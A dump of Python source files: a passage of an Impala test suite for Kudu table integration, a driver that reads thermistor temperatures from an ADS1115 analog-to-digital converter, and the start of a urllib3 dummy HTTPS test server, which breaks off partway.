cursor.execute("CREATE EXTERNAL TABLE %s STORED AS KUDU %s" % (impala_table_name,
props))
with self.drop_impala_table_after_context(cursor, impala_table_name):
cursor.execute("SELECT COUNT(*) FROM %s" % impala_table_name)
assert cursor.fetchall() == [(0, )]
try:
cursor.execute("SELECT COUNT(*) FROM %s" % impala_table_name)
assert False
except Exception as e:
assert "Could not resolve table reference" in str(e)
assert kudu_client.table_exists(kudu_table.name)
@SkipIfKudu.hms_integration_enabled
def test_explicit_name(self, cursor, kudu_client):
"""Check that a Kudu table can be specified using a table property."""
with self.temp_kudu_table(kudu_client, [INT32]) as kudu_table:
table_name = self.random_table_name()
cursor.execute("""
CREATE EXTERNAL TABLE %s
STORED AS KUDU
TBLPROPERTIES('kudu.table_name' = '%s')""" % (table_name, kudu_table.name))
with self.drop_impala_table_after_context(cursor, table_name):
cursor.execute("SELECT * FROM %s" % table_name)
assert len(cursor.fetchall()) == 0
@SkipIfKudu.hms_integration_enabled
def test_explicit_name_preference(self, cursor, kudu_client):
"""Check that the table name from a table property is used when a table of the
implied name also exists.
"""
with self.temp_kudu_table(kudu_client, [INT64]) as preferred_kudu_table:
with self.temp_kudu_table(kudu_client, [INT8]) as other_kudu_table:
impala_table_name = self.get_kudu_table_base_name(other_kudu_table.name)
cursor.execute("""
CREATE EXTERNAL TABLE %s
STORED AS KUDU
TBLPROPERTIES('kudu.table_name' = '%s')""" % (
impala_table_name, preferred_kudu_table.name))
with self.drop_impala_table_after_context(cursor, impala_table_name):
cursor.execute("DESCRIBE %s" % impala_table_name)
assert cursor.fetchall() == \
[("a", "bigint", "", "true", "false", "", "AUTO_ENCODING",
"DEFAULT_COMPRESSION", "0")]
@SkipIfKudu.hms_integration_enabled
def test_explicit_name_doesnt_exist(self, cursor, kudu_client):
kudu_table_name = self.random_table_name()
try:
cursor.execute("""
CREATE EXTERNAL TABLE %s
STORED AS KUDU
TBLPROPERTIES('kudu.table_name' = '%s')""" % (
self.random_table_name(), kudu_table_name))
assert False
except Exception as e:
assert "Table does not exist in Kudu: '%s'" % kudu_table_name in str(e)
@SkipIfKudu.hms_integration_enabled
def test_explicit_name_doesnt_exist_but_implicit_does(self, cursor, kudu_client):
"""Check that when an explicit table name is given but that table doesn't exist,
there is no fall-through to an existing implicit table.
"""
with self.temp_kudu_table(kudu_client, [INT32]) as kudu_table:
table_name = self.random_table_name()
try:
cursor.execute("""
CREATE EXTERNAL TABLE %s
STORED AS KUDU
TBLPROPERTIES('kudu.table_name' = '%s')""" % (
self.get_kudu_table_base_name(kudu_table.name), table_name))
assert False
except Exception as e:
assert "Table does not exist in Kudu: '%s'" % table_name in str(e)
@SkipIfKudu.no_hybrid_clock
@SkipIfKudu.hms_integration_enabled
def test_table_without_partitioning(self, cursor, kudu_client, unique_database):
"""Test a Kudu table created without partitioning (i.e. equivalent to a single
unbounded partition). It is not possible to create such a table in Impala, but
it can be created directly in Kudu and then loaded as an external table.
Regression test for IMPALA-5154."""
cursor.execute("set kudu_read_mode=READ_AT_SNAPSHOT")
schema_builder = SchemaBuilder()
column_spec = schema_builder.add_column("id", INT64)
column_spec.nullable(False)
schema_builder.set_primary_keys(["id"])
schema = schema_builder.build()
partitioning = Partitioning().set_range_partition_columns([])
name = "%s.one_big_unbounded_partition" % unique_database
try:
kudu_client.create_table(name, schema, partitioning=partitioning)
kudu_table = kudu_client.table(name)
props = "TBLPROPERTIES('kudu.table_name'='%s')" % name
cursor.execute("CREATE EXTERNAL TABLE %s STORED AS KUDU %s" % (name, props))
with self.drop_impala_table_after_context(cursor, name):
cursor.execute("INSERT INTO %s VALUES (1), (2), (3)" % name)
cursor.execute("SELECT COUNT(*) FROM %s" % name)
assert cursor.fetchall() == [(3, )]
try:
cursor.execute("SHOW RANGE PARTITIONS %s" % name)
assert False
except Exception as e:
assert "AnalysisException: SHOW RANGE PARTITIONS requested but table does "\
"not have range partitions" in str(e)
finally:
if kudu_client.table_exists(name):
kudu_client.delete_table(name)
@SkipIfKudu.no_hybrid_clock
@SkipIfKudu.hms_integration_enabled
def test_column_name_case(self, cursor, kudu_client, unique_database):
"""IMPALA-5286: Tests that an external Kudu table that was created with a column name
containing upper case letters is handled correctly."""
cursor.execute("set kudu_read_mode=READ_AT_SNAPSHOT")
table_name = '%s.kudu_external_test' % unique_database
if kudu_client.table_exists(table_name):
kudu_client.delete_table(table_name)
schema_builder = SchemaBuilder()
key_col = 'Key'
schema_builder.add_column(key_col, INT64).nullable(False).primary_key()
schema = schema_builder.build()
partitioning = Partitioning().set_range_partition_columns([key_col])\
.add_range_partition([1], [10])
try:
kudu_client.create_table(table_name, schema, partitioning)
props = "tblproperties('kudu.table_name' = '%s')" % table_name
cursor.execute("create external table %s stored as kudu %s" % (table_name, props))
# Perform a variety of operations on the table.
cursor.execute("insert into %s (kEy) values (5), (1), (4)" % table_name)
cursor.execute("select keY from %s where KeY %% 2 = 0" % table_name)
assert cursor.fetchall() == [(4, )]
cursor.execute("select * from %s order by kEY" % (table_name))
assert cursor.fetchall() == [(1, ), (4, ), (5, )]
# Do a join with a runtime filter targeting the column.
cursor.execute("select count(*) from %s a, %s b where a.key = b.key" %
(table_name, table_name))
assert cursor.fetchall() == [(3, )]
cursor.execute("alter table %s add range partition 11 < values < 20" % table_name)
new_key = "KEY2"
cursor.execute("alter table %s change KEy %s bigint" % (table_name, new_key))
val_col = "vaL"
cursor.execute("alter table %s add columns (%s bigint)" % (table_name, val_col))
cursor.execute("describe %s" % table_name)
results = cursor.fetchall()
# 'describe' should print the column name in lower case.
assert new_key.lower() in results[0]
assert val_col.lower() in results[1]
cursor.execute("alter table %s drop column Val" % table_name);
cursor.execute("describe %s" % table_name)
assert len(cursor.fetchall()) == 1
cursor.execute("alter table %s drop range partition 11 < values < 20" % table_name)
finally:
if kudu_client.table_exists(table_name):
kudu_client.delete_table(table_name)
@SkipIfKudu.hms_integration_enabled
def test_conflicting_column_name(self, cursor, kudu_client, unique_database):
"""IMPALA-5283: Tests that loading an external Kudu table that was created with column
names that differ only in case results in an error."""
table_name = '%s.kudu_external_test' % unique_database
if kudu_client.table_exists(table_name):
kudu_client.delete_table(table_name)
schema_builder = SchemaBuilder()
col0 = 'col'
schema_builder.add_column(col0, INT64).nullable(False).primary_key()
col1 = 'COL'
schema_builder.add_column(col1, INT64)
schema = schema_builder.build()
partitioning = Partitioning().set_range_partition_columns([col0])\
.add_range_partition([1], [10])
try:
kudu_client.create_table(table_name, schema, partitioning)
props = "tblproperties('kudu.table_name' = '%s')" % table_name
cursor.execute("create external table %s stored as kudu %s" % (table_name, props))
assert False, 'create table should have resulted in an exception'
except Exception as e:
assert 'Error loading Kudu table: Impala does not support column names that ' \
+ 'differ only in casing' in str(e)
finally:
if kudu_client.table_exists(table_name):
kudu_client.delete_table(table_name)
class TestShowCreateTable(KuduTestSuite):
column_properties = "ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION"
def assert_show_create_equals(self, cursor, create_sql, show_create_sql):
"""Executes 'create_sql' to create a table, then runs "SHOW CREATE TABLE" and checks
that the output is the same as 'show_create_sql'. 'create_sql' and
'show_create_sql' can be templates that can be used with str.format(). format()
will be called with 'table' and 'db' as keyword args.
"""
format_args = {"table": self.random_table_name(), "db": cursor.conn.db_name}
cursor.execute(create_sql.format(**format_args))
cursor.execute("SHOW CREATE TABLE {table}".format(**format_args))
assert cursor.fetchall()[0][0] == \
textwrap.dedent(show_create_sql.format(**format_args)).strip()
@SkipIfKudu.hms_integration_enabled
def test_primary_key_and_distribution(self, cursor):
# TODO: Add case with BLOCK_SIZE
self.assert_show_create_equals(cursor,
"""
CREATE TABLE {table} (c INT PRIMARY KEY)
PARTITION BY HASH (c) PARTITIONS 3 STORED AS KUDU""",
"""
CREATE TABLE {db}.{{table}} (
c INT NOT NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION,
PRIMARY KEY (c)
)
PARTITION BY HASH (c) PARTITIONS 3
STORED AS KUDU
TBLPROPERTIES ('kudu.master_addresses'='{kudu_addr}')""".format(
db=cursor.conn.db_name, kudu_addr=KUDU_MASTER_HOSTS))
self.assert_show_create_equals(cursor,
"""
CREATE TABLE {table} (c INT PRIMARY KEY, d STRING NULL)
PARTITION BY HASH (c) PARTITIONS 3, RANGE (c)
(PARTITION VALUES <= 1, PARTITION 1 < VALUES <= 2,
PARTITION 2 < VALUES) STORED AS KUDU""",
"""
CREATE TABLE {db}.{{table}} (
c INT NOT NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION,
d STRING NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION,
PRIMARY KEY (c)
)
PARTITION BY HASH (c) PARTITIONS 3, RANGE (c) (...)
STORED AS KUDU
TBLPROPERTIES ('kudu.master_addresses'='{kudu_addr}')""".format(
db=cursor.conn.db_name, kudu_addr=KUDU_MASTER_HOSTS))
self.assert_show_create_equals(cursor,
"""
CREATE TABLE {table} (c INT ENCODING PLAIN_ENCODING, PRIMARY KEY (c))
PARTITION BY HASH (c) PARTITIONS 3 STORED AS KUDU""",
"""
CREATE TABLE {db}.{{table}} (
c INT NOT NULL ENCODING PLAIN_ENCODING COMPRESSION DEFAULT_COMPRESSION,
PRIMARY KEY (c)
)
PARTITION BY HASH (c) PARTITIONS 3
STORED AS KUDU
TBLPROPERTIES ('kudu.master_addresses'='{kudu_addr}')""".format(
db=cursor.conn.db_name, kudu_addr=KUDU_MASTER_HOSTS))
self.assert_show_create_equals(cursor,
"""
CREATE TABLE {table} (c INT COMPRESSION LZ4, d STRING, PRIMARY KEY(c, d))
PARTITION BY HASH (c) PARTITIONS 3, HASH (d) PARTITIONS 3,
RANGE (c, d) (PARTITION VALUE = (1, 'aaa'), PARTITION VALUE = (2, 'bbb'))
STORED AS KUDU""",
"""
CREATE TABLE {db}.{{table}} (
c INT NOT NULL ENCODING AUTO_ENCODING COMPRESSION LZ4,
d STRING NOT NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION,
PRIMARY KEY (c, d)
)
PARTITION BY HASH (c) PARTITIONS 3, HASH (d) PARTITIONS 3, RANGE (c, d) (...)
STORED AS KUDU
TBLPROPERTIES ('kudu.master_addresses'='{kudu_addr}')""".format(
db=cursor.conn.db_name, kudu_addr=KUDU_MASTER_HOSTS))
self.assert_show_create_equals(cursor,
"""
CREATE TABLE {table} (c INT, d STRING, e INT NULL DEFAULT 10, PRIMARY KEY(c, d))
PARTITION BY RANGE (c) (PARTITION VALUES <= 1, PARTITION 1 < VALUES <= 2,
PARTITION 2 < VALUES <= 3, PARTITION 3 < VALUES) STORED AS KUDU""",
"""
CREATE TABLE {db}.{{table}} (
c INT NOT NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION,
d STRING NOT NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION,
e INT NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION DEFAULT 10,
PRIMARY KEY (c, d)
)
PARTITION BY RANGE (c) (...)
STORED AS KUDU
TBLPROPERTIES ('kudu.master_addresses'='{kudu_addr}')""".format(
db=cursor.conn.db_name, kudu_addr=KUDU_MASTER_HOSTS))
self.assert_show_create_equals(cursor,
"""
CREATE TABLE {table} (c INT PRIMARY KEY) STORED AS KUDU""",
"""
CREATE TABLE {db}.{{table}} (
c INT NOT NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION,
PRIMARY KEY (c)
)
STORED AS KUDU
TBLPROPERTIES ('kudu.master_addresses'='{kudu_addr}')""".format(
db=cursor.conn.db_name, kudu_addr=KUDU_MASTER_HOSTS))
self.assert_show_create_equals(cursor,
"""
CREATE TABLE {table} (c INT COMMENT 'Ab 1@' PRIMARY KEY) STORED AS KUDU""",
"""
CREATE TABLE {db}.{{table}} (
c INT NOT NULL {p} COMMENT 'Ab 1@',
PRIMARY KEY (c)
)
STORED AS KUDU
TBLPROPERTIES ('kudu.master_addresses'='{kudu_addr}')""".format(
db=cursor.conn.db_name, p=self.column_properties,
kudu_addr=KUDU_MASTER_HOSTS))
@SkipIfKudu.hms_integration_enabled
def test_timestamp_default_value(self, cursor):
create_sql_fmt = """
CREATE TABLE {table} (c INT, d TIMESTAMP,
e TIMESTAMP NULL DEFAULT CAST('%s' AS TIMESTAMP),
PRIMARY KEY(c, d))
PARTITION BY HASH(c) PARTITIONS 3
STORED AS KUDU"""
# Long lines are unfortunate, but extra newlines will break the test.
show_create_sql_fmt = """
CREATE TABLE {db}.{{table}} (
c INT NOT NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION,
d TIMESTAMP NOT NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION,
e TIMESTAMP NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION DEFAULT unix_micros_to_utc_timestamp(%s),
PRIMARY KEY (c, d)
)
PARTITION BY HASH (c) PARTITIONS 3
STORED AS KUDU
TBLPROPERTIES ('kudu.master_addresses'='{kudu_addr}')""".format(
db=cursor.conn.db_name, kudu_addr=KUDU_MASTER_HOSTS)
self.assert_show_create_equals(cursor,
create_sql_fmt % ("2009-01-01 00:00:00.000001000"),
show_create_sql_fmt % ("1230768000000001"))
self.assert_show_create_equals(cursor,
create_sql_fmt % ("2009-01-01 00:00:00.000001001"),
show_create_sql_fmt % ("1230768000000001"))
self.assert_show_create_equals(cursor,
create_sql_fmt % ("2009-01-01 00:00:00.000000999"),
show_create_sql_fmt % ("1230768000000001"))
@SkipIfKudu.hms_integration_enabled
def test_external_kudu_table_name_with_show_create(self, cursor, kudu_client,
unique_database):
"""Check that the generated kudu.table_name tblproperty is present with
show create table with external Kudu tables.
"""
schema_builder = SchemaBuilder()
column_spec = schema_builder.add_column("id", INT64)
column_spec.nullable(False)
schema_builder.set_primary_keys(["id"])
partitioning = Partitioning().set_range_partition_columns(["id"])
schema = schema_builder.build()
kudu_table_name = self.random_table_name()
try:
kudu_client.create_table(kudu_table_name, schema, partitioning)
kudu_table = kudu_client.table(kudu_table_name)
table_name_prop = "'kudu.table_name'='%s'" % kudu_table.name
self.assert_show_create_equals(cursor,
"""
CREATE EXTERNAL TABLE {{table}} STORED AS KUDU
TBLPROPERTIES({props})""".format(
props=table_name_prop),
"""
CREATE EXTERNAL TABLE {db}.{{table}}
STORED AS KUDU
TBLPROPERTIES ('kudu.master_addresses'='{kudu_addr}', {kudu_table})""".format(
db=cursor.conn.db_name, kudu_addr=KUDU_MASTER_HOSTS,
kudu_table=table_name_prop))
finally:
if kudu_client.table_exists(kudu_table_name):
kudu_client.delete_table(kudu_table_name)
@SkipIfKudu.hms_integration_enabled
def test_managed_kudu_table_name_with_show_create(self, cursor):
"""Check that the generated kudu.table_name tblproperty is not present with
show create table with managed Kudu tables.
"""
self.assert_show_create_equals(cursor,
"""
CREATE TABLE {table} (c INT PRIMARY KEY)
PARTITION BY HASH (c) PARTITIONS 3
STORED AS KUDU""",
"""
CREATE TABLE {db}.{{table}} (
c INT NOT NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION,
PRIMARY KEY (c)
)
PARTITION BY HASH (c) PARTITIONS 3
STORED AS KUDU
TBLPROPERTIES ('kudu.master_addresses'='{kudu_addr}')""".format(
db=cursor.conn.db_name, kudu_addr=KUDU_MASTER_HOSTS))
class TestDropDb(KuduTestSuite):
@SkipIfKudu.hms_integration_enabled
def test_drop_non_empty_db(self, unique_cursor, kudu_client):
"""Check that an attempt to drop a database will fail if Kudu tables are present
and that the tables remain.
"""
db_name = unique_cursor.conn.db_name
with self.temp_kudu_table(kudu_client, [INT32], db_name=db_name) as kudu_table:
impala_table_name = self.get_kudu_table_base_name(kudu_table.name)
props = "TBLPROPERTIES('kudu.table_name'='%s')" % kudu_table.name
unique_cursor.execute("CREATE EXTERNAL TABLE %s STORED AS KUDU %s" % (
impala_table_name, props))
unique_cursor.execute("USE DEFAULT")
try:
unique_cursor.execute("DROP DATABASE %s" % db_name)
assert False
except Exception as e:
assert "One or more tables exist" in str(e)
unique_cursor.execute("SELECT COUNT(*) FROM %s.%s" % (db_name, impala_table_name))
assert unique_cursor.fetchall() == [(0, )]
@SkipIfKudu.hms_integration_enabled
def test_drop_db_cascade(self, unique_cursor, kudu_client):
"""Check that an attempt to drop a database will succeed even if Kudu tables are
present and that the managed tables are removed.
"""
db_name = unique_cursor.conn.db_name
with self.temp_kudu_table(kudu_client, [INT32], db_name=db_name) as kudu_table:
# Create an external Kudu table
impala_table_name = self.get_kudu_table_base_name(kudu_table.name)
props = "TBLPROPERTIES('kudu.table_name'='%s')" % kudu_table.name
unique_cursor.execute("CREATE EXTERNAL TABLE %s STORED AS KUDU %s" % (
impala_table_name, props))
# Create a managed Kudu table
managed_table_name = self.random_table_name()
unique_cursor.execute("""
CREATE TABLE %s (a INT PRIMARY KEY) PARTITION BY HASH (a) PARTITIONS 3
STORED AS KUDU""" % managed_table_name)
kudu_table_name = "impala::" + db_name + "." + managed_table_name
assert kudu_client.table_exists(kudu_table_name)
# Create a table in HDFS
hdfs_table_name = self.random_table_name()
unique_cursor.execute("""
CREATE TABLE %s (a INT) PARTITIONED BY (x INT)""" % (hdfs_table_name))
unique_cursor.execute("USE DEFAULT")
unique_cursor.execute("DROP DATABASE %s CASCADE" % db_name)
unique_cursor.execute("SHOW DATABASES")
assert (db_name, '') not in unique_cursor.fetchall()
assert kudu_client.table_exists(kudu_table.name)
assert not kudu_client.table_exists(managed_table_name)
class TestImpalaKuduIntegration(KuduTestSuite):
@SkipIfKudu.hms_integration_enabled
def test_replace_kudu_table(self, cursor, kudu_client):
"""Check that an external Kudu table is accessible if the underlying Kudu table is
modified using the Kudu client.
"""
# Create an external Kudu table
col_names = ['a']
with self.temp_kudu_table(kudu_client, [INT32], col_names=col_names) as kudu_table:
impala_table_name = self.get_kudu_table_base_name(kudu_table.name)
props = "TBLPROPERTIES('kudu.table_name'='%s')" % kudu_table.name
cursor.execute("CREATE EXTERNAL TABLE %s STORED AS KUDU %s" % (
impala_table_name, props))
cursor.execute("DESCRIBE %s" % (impala_table_name))
assert cursor.fetchall() == \
[("a", "int", "", "true", "false", "", "AUTO_ENCODING",
"DEFAULT_COMPRESSION", "0")]
# Drop the underlying Kudu table and replace it with another Kudu table that has
# the same name but different schema
kudu_client.delete_table(kudu_table.name)
assert not kudu_client.table_exists(kudu_table.name)
new_col_names = ['b', 'c']
name_parts = kudu_table.name.split(".")
assert len(name_parts) == 2
with self.temp_kudu_table(kudu_client, [STRING, STRING], col_names=new_col_names,
db_name=name_parts[0], name= name_parts[1]) as new_kudu_table:
assert kudu_client.table_exists(new_kudu_table.name)
# Refresh the external table and verify that the new schema is loaded from
# Kudu.
cursor.execute("REFRESH %s" % (impala_table_name))
cursor.execute("DESCRIBE %s" % (impala_table_name))
assert cursor.fetchall() == \
[("b", "string", "", "true", "false", "", "AUTO_ENCODING",
"DEFAULT_COMPRESSION", "0"),
("c", "string", "", "false", "true", "", "AUTO_ENCODING",
"DEFAULT_COMPRESSION", "0")]
@SkipIfKudu.hms_integration_enabled
def test_delete_external_kudu_table(self, cursor, kudu_client):
"""Check that Impala can recover from the case where the underlying Kudu table of
an external table is dropped using the Kudu client.
"""
with self.temp_kudu_table(kudu_client, [INT32]) as kudu_table:
# Create an external Kudu table
impala_table_name = self.get_kudu_table_base_name(kudu_table.name)
props = "TBLPROPERTIES('kudu.table_name'='%s')" % kudu_table.name
cursor.execute("CREATE EXTERNAL TABLE %s STORED AS KUDU %s" % (
impala_table_name, props))
cursor.execute("DESCRIBE %s" % (impala_table_name))
assert cursor.fetchall() == \
[("a", "int", "", "true", "false", "", "AUTO_ENCODING",
"DEFAULT_COMPRESSION", "0")]
# Drop the underlying Kudu table
kudu_client.delete_table(kudu_table.name)
assert not kudu_client.table_exists(kudu_table.name)
err_msg = 'the table does not exist: table_name: "%s"' % (kudu_table.name)
try:
cursor.execute("REFRESH %s" % (impala_table_name))
except Exception as e:
assert err_msg in str(e)
cursor.execute("DROP TABLE %s" % (impala_table_name))
cursor.execute("SHOW TABLES")
assert (impala_table_name,) not in cursor.fetchall()
@SkipIfKudu.hms_integration_enabled
def test_delete_managed_kudu_table(self, cursor, kudu_client, unique_database):
"""Check that dropping a managed Kudu table works even if the underlying Kudu table
has been dropped externally."""
impala_tbl_name = "foo"
cursor.execute("""CREATE TABLE %s.%s (a INT PRIMARY KEY) PARTITION BY HASH (a)
PARTITIONS 3 STORED AS KUDU""" % (unique_database, impala_tbl_name))
kudu_tbl_name = KuduTestSuite.to_kudu_table_name(unique_database, impala_tbl_name)
assert kudu_client.table_exists(kudu_tbl_name)
kudu_client.delete_table(kudu_tbl_name)
assert not kudu_client.table_exists(kudu_tbl_name)
cursor.execute("DROP TABLE %s.%s" % (unique_database, impala_tbl_name))
cursor.execute("SHOW TABLES IN %s" % unique_database)
assert (impala_tbl_name,) not in cursor.fetchall()
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
class TestKuduMemLimits(KuduTestSuite):
QUERIES = ["select * from tpch_kudu.lineitem where l_orderkey = -1",
"select * from tpch_kudu.lineitem where l_commitdate like '%cheese'",
"select * from tpch_kudu.lineitem limit 90"]
# The value indicates the minimum memory requirements for the queries above, the first
# memory limit corresponds to the first query
QUERY_MEM_LIMITS = [1, 1, 10]
@pytest.mark.execute_serially
@pytest.mark.parametrize("mem_limit", [1, 10, 0])
def test_low_mem_limit_low_selectivity_scan(self, cursor, mem_limit, vector):
"""Tests that the queries specified in this test suite run under the given
memory limits."""
exec_options = dict((k, str(v)) for k, v
in vector.get_value('exec_option').iteritems())
exec_options['mem_limit'] = "{0}m".format(mem_limit)
for i, q in enumerate(self.QUERIES):
try:
cursor.execute(q, configuration=exec_options)
cursor.fetchall()
except Exception as e:
if (mem_limit > self.QUERY_MEM_LIMITS[i]):
raise
assert "Memory limit exceeded" in str(e)
# IMPALA-4654: Validate the fix for a bug where LimitReached() wasn't respected in
# the KuduScanner and the limit query above would result in a fragment running an
# additional minute. This ensures that the num fragments 'in flight' reaches 0 in
# less time than IMPALA-4654 was reproducing (~60sec) but yet still enough time that
# this test won't be flaky.
verifiers = [ MetricVerifier(i.service) for i in ImpalaCluster().impalads ]
for v in verifiers:
v.wait_for_metric("impala-server.num-fragments-in-flight", 0, timeout=30)
|
ADS1115TempSensor.py
|
from MQTT import Publisher, Subscriber, Client
import math
import threading
import time
import log
import Filter
import time
import board
import busio
import adafruit_ads1x15.ads1115 as ADS
from adafruit_ads1x15.analog_in import AnalogIn
import Threaded
# Create the I2C bus
def get_i2c():
return busio.I2C(board.SCL, board.SDA)
class ADS1115(object):
def __init__(self, gain : int = 1, ref_channel : int = None):
self.ads = None
self.chans = [ADS.P0, ADS.P1, ADS.P2, ADS.P3 ] # available channels
self.channels = []
self.ref_channel = ref_channel
self.lock = threading.Lock() # lock for reset
self.logger = log.get_logger("ADS1115")
self.gain = gain
self.reset()
# currently the sensor hangs from time to time (i.e. no value change anymore)
def reset(self):
self.logger.info("Resetting.")
with self.lock:
if not self.ads is None:
self.ads.i2c_device.i2c.deinit()
self.ads = None
self.channels = []
self.ads = ADS.ADS1115(get_i2c())
self.ads.gain = self.gain # see datasheet for gain levels (defines voltage range)
# if no ref channel selected, just use the channels as they are
if self.ref_channel is None:
for chan in self.chans:
self.channels.append(AnalogIn(self.ads, chan))
else:
if self.ref_channel < 0 or self.ref_channel > 3:
raise ValueError("invalid reference channel")
for chan in self.chans:
if chan == self.chans[self.ref_channel]: continue # omit ref channel
# might throw if wrong combination is selected
self.channels.append(AnalogIn(self.ads, chan, self.chans[self.ref_channel]))
def ref(self):
return self.ref_channel
def __check_channel_index__(self, channel : int):
if channel < 0 or channel > 3:
raise ValueError("invalid channel number")
if not self.ref_channel is None:
if self.ref_channel == channel:
raise ValueError("can't select ref channel")
def get_value(self, channel : int):
with self.lock:
self.__check_channel_index__(channel)
return self.channels[channel].value
def get_voltage(self, channel : int):
with self.lock:
self.__check_channel_index__(channel)
return self.channels[channel].voltage
'''
Vcc -----------+----------------------------+
| |
[ ] R_serial |
| |
+----------------+ U_ref
| | |
[ ] R_NTC U_NTC |
| | |
GND -----------+----------------+-----------+
'''
class NTCAdapter(object):
def __init__(self, ads : ADS1115, channel : int, ref_channel : int):
self.ads = ads
self.channel = channel
self.ref_channel = ref_channel
self.r_serial = 22e3 # 22kOhm
self.coeffs = [8.00796252e-04, 2.80177169e-04, -3.14619144e-06, 3.06728618e-07]
def get_temperature(self):
# vcc to gnd
u_ref = self.ads.get_voltage(self.ref_channel)
# voltage of ntc (ntc to ground)
u_ntc = self.ads.get_voltage(self.channel)
# resulting voltage at the measurment resistor
u_r = abs(u_ref - u_ntc)
# current through the measurement resitor
i = u_r / self.r_serial
# resulting resistance of the ntc
r_ntc = u_ntc / i
# use Steinhart-Hart-Equation for temperature estimation
log_r = math.log(r_ntc)
sum = 0.
for i in range(0, len(self.coeffs)):
sum += self.coeffs[i] * math.pow(log_r, i)
return ( 1. / sum ) - 273.15 # kelvin to °C
class ADSTemperatureThreadedReader(Threaded.Threaded):
def __init__(self, adapters : [NTCAdapter]):
self.logger = log.get_logger("ADSReader")
super(ADSTemperatureThreadedReader, self).__init__(self.logger)
self.adapters = adapters
self.measurements = 5 # number of measurements to do
self.measurement_delay = 1000 # delay between measurements in ms
self.filters = []
for _ in range(0, len(self.adapters)):
self.filters.append(Filter.MovingAverage(10))
self.temperatures = [None] * len(self.adapters)
self.lock = threading.Lock()
# reads the temperature of all channels
def looped(self):
temperatures = [0] * len(self.adapters)
for i in range(0, len(self.adapters)):
temperatures[i] = self.filters[i].feed(self.adapters[i].get_temperature())
with self.lock:
self.temperatures = temperatures
time.sleep(self.measurement_delay / 1000.)
def get_channel_temperature(self, channel : int):
if channel < 0 or channel >= len(self.adapters):
raise ValueError("invalid channel number '{}'".format(channel))
with self.lock:
value = self.temperatures[channel]
if value is None:
return None
else:
return round(value, 1)
# class ADS1115_NTC(object):
# def __init__(self):
# self.r_serial = 22e3 # 22kOhm
# self.address = 0x48 # I2C address
# self.gain = 1 # voltage range gain level
# self.max_voltage = 4.096 # resulting voltage range
# self.coeffs = [8.00796252e-04, 2.80177169e-04, -3.14619144e-06, 3.06728618e-07]
# self.ref_channel = 3 # channel that measures the ref voltage
# self.temperatures_per_channel = []
# self.adc =Adafruit_ADS1x15.ADS1115(address=self.address, )
# self.measurements = 5 # number of measurements to do
# self.measurement_delay = 5000 # delay between measurements in ms
# self.lock = threading.Lock()
# self.logger = log.get_logger("ADS1115")
# def __to_volt__(self, value : int):
# return self.max_voltage * value / 32768.
# def __get_voltage__(self, channel : int):
# return self.__to_volt__(self.adc.read_adc(channel, gain=self.gain))
# def __temperature_from_volt__(self, u_ntc : float, u_ref : float):
# r = 22000
# u_r = abs(u_ref - u_ntc)
# i = u_r / r
# r_ntc = u_ntc / i
# log_r = math.log(r_ntc)
# sum = 0.
# for i in range(0, len(self.coeffs)):
# sum += self.coeffs[i] * math.pow(log_r, i)
# return ( 1. / sum ) - 273.15 # kelvin to °C
# # get the reference channel voltage
# def __get_ref_voltage__(self):
# return self.__get_voltage__(self.ref_channel)
# def __get_temperature__(self, channel : int):
# u_ref = self.__get_ref_voltage__()
# u_channel = self.__get_voltage__(channel)
# # if we have not connected or shorted channel,
# # channel and ref voltage could be the same
# if u_ref <= u_channel: return -273.15
# return self.__temperature_from_volt__(u_channel, u_ref)
# # reads the temperature of all channels
# def __acquire_temperature__(self):
# temperatures = []
# for channel in range(0, 3):
# t = 0
# for _ in range(0, self.measurements):
# t += self.__get_temperature__(channel)
# time.sleep(self.measurement_delay / 1000.)
# t /= float(self.measurements)
# temperatures.append(t)
# with self.lock:
# self.temperatures_per_channel = temperatures
# def __thread_loop__(self):
# while True:
# self.__acquire_temperature__()
# time.sleep(10)
# def run(self):
# self.logger.info("Starting thread for ADS1115")
# threading.Thread(target=self.__thread_loop__).start()
# def get_channel_temperature(self, channel : int):
# with self.lock:
# # not filled already?
# if len(self.temperatures_per_channel) <= channel:
# raise "Not ready yet"
# return self.temperatures_per_channel[channel]
|
server.py
|
#!/usr/bin/env python
"""
Dummy server used for unit testing.
"""
from __future__ import print_function
import errno
import logging
import os
import random
import string
import sys
import threading
import socket
import warnings
from datetime import datetime
from urllib3.exceptions import HTTPWarning
from tornado.platform.auto import set_close_exec
import tornado.httpserver
import tornado.ioloop
import tornado.web
log = logging.getLogger(__name__)
CERTS_PATH = os.path.join(os.path.dirname(__file__), 'certs')
DEFAULT_CERTS = {
'certfile': os.path.join(CERTS_PATH, 'server.crt'),
'keyfile': os.path.join(CERTS_PATH, 'server.key'),
}
NO_SAN_CERTS = {
'certfile': os.path.join(CERTS_PATH, 'server.no_san.crt'),
'keyfile': DEFAULT_CERTS['keyfile']
}
IP_SAN_CERTS = {
'certfile': os.path.join(CERTS_PATH, 'server.ip_san.crt'),
'keyfile': DEFAULT_CERTS['keyfile']
}
IPV6_ADDR_CERTS = {
'certfile': os.path.join(CERTS_PATH, 'server.ipv6addr.crt'),
'keyfile': os.path.join(CERTS_PATH, 'server.ipv6addr.key'),
}
DEFAULT_CA = os.path.join(CERTS_PATH, 'cacert.pem')
DEFAULT_CA_BAD = os.path.join(CERTS_PATH, 'client_bad.pem')
NO_SAN_CA = os.path.join(CERTS_PATH, 'cacert.no_san.pem')
DEFAULT_CA_DIR = os.path.join(CERTS_PATH, 'ca_path_test')
IPV6_ADDR_CA = os.path.join(CERTS_PATH, 'server.ipv6addr.crt')
def _has_ipv6(host):
""" Returns True if the system can bind an IPv6 address. """
sock = None
has_ipv6 = False
if socket.has_ipv6:
